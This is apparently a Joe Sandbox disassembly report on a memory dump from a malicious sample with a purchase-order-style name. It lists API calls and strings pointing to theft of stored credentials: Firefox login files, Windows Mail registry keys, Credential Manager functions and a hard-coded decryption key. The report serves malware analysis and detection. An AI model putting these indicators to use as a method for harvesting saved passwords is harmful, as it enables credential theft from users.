                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                • API String ID: 710961058-601624466
                                                                                • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: sprintf$memset$_mbscpy
                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                • API String ID: 3402215030-3842416460
                                                                                • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                APIs
                                                                                  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                  • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                  • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                • strlen.MSVCRT ref: 0040F139
                                                                                • strlen.MSVCRT ref: 0040F147
                                                                                • memset.MSVCRT ref: 0040F187
                                                                                • strlen.MSVCRT ref: 0040F196
                                                                                • strlen.MSVCRT ref: 0040F1A4
                                                                                • memset.MSVCRT ref: 0040F1EA
                                                                                • strlen.MSVCRT ref: 0040F1F9
                                                                                • strlen.MSVCRT ref: 0040F207
                                                                                • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                • API String ID: 2003275452-3138536805
                                                                                • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C3F7
                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                • strrchr.MSVCRT ref: 0040C417
                                                                                • _mbscat.MSVCRT ref: 0040C431
                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                • API String ID: 1012775001-1343505058
                                                                                • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _strcmpi
                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                • API String ID: 1439213657-1959339147
                                                                                • Opcode ID: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                                                                • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                • Opcode Fuzzy Hash: fc398c435b3d1a27aa6bafcedfb0a9c88799152dfe3da8b7518a640bbec7b317
                                                                                • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00444612
                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                • strlen.MSVCRT ref: 0044462E
                                                                                • memset.MSVCRT ref: 00444668
                                                                                • memset.MSVCRT ref: 0044467C
                                                                                • memset.MSVCRT ref: 00444690
                                                                                • memset.MSVCRT ref: 004446B6
                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset$strlen$_mbscpy
                                                                                • String ID: salu
                                                                                • API String ID: 3691931180-4177317985
                                                                                • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                • API String ID: 2449869053-232097475
                                                                                • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                APIs
                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                • strlen.MSVCRT ref: 00443AD2
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                                • memset.MSVCRT ref: 00443B2E
                                                                                • memset.MSVCRT ref: 00443B4B
                                                                                • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                  • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                Strings
                                                                                • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                • Salt, xrefs: 00443BA7
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                • API String ID: 665470638-2687544566
                                                                                • Opcode ID: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                                                • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                • Opcode Fuzzy Hash: 6787fe3cb722289860c649d1ac39d59f6fa495d393f101254fe25d4dff6edb57
                                                                                • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                • memset.MSVCRT ref: 0040F84A
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                • API String ID: 551151806-1288872324
                                                                                • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                APIs
                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75920A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75920A60), ref: 00406D4D
                                                                                • memset.MSVCRT ref: 00403ECE
                                                                                • memset.MSVCRT ref: 00403EE2
                                                                                • memset.MSVCRT ref: 00403EF6
                                                                                • sprintf.MSVCRT ref: 00403F17
                                                                                • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                • sprintf.MSVCRT ref: 00403F6A
                                                                                • sprintf.MSVCRT ref: 00403F9B
                                                                                Strings
                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                • API String ID: 113626815-1670831295
                                                                                • Opcode ID: b2fae93db892e93611053a9993d135149b989cdc37ddc67be39363e78f3e4061
                                                                                • Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
                                                                                • Opcode Fuzzy Hash: b2fae93db892e93611053a9993d135149b989cdc37ddc67be39363e78f3e4061
                                                                                • Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69
                                                                                APIs
                                                                                • sprintf.MSVCRT ref: 0040957B
                                                                                • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                • sprintf.MSVCRT ref: 004095EB
                                                                                • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                • memset.MSVCRT ref: 0040961C
                                                                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                • String ID: caption$dialog_%d$menu_%d
                                                                                • API String ID: 3259144588-3822380221
                                                                                • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                APIs
                                                                                  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                • API String ID: 2449869053-4258758744
                                                                                • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                APIs
                                                                                • wcsstr.MSVCRT ref: 0040426A
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                • strchr.MSVCRT ref: 004042F6
                                                                                • strlen.MSVCRT ref: 0040430A
                                                                                • sprintf.MSVCRT ref: 0040432B
                                                                                • strchr.MSVCRT ref: 0040433C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                • String ID: %s@gmail.com$www.google.com
                                                                                • API String ID: 3866421160-4070641962
                                                                                • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                APIs
                                                                                • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                • memset.MSVCRT ref: 004097BD
                                                                                • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                • API String ID: 1035899707-3647959541
                                                                                • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                APIs
                                                                                • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
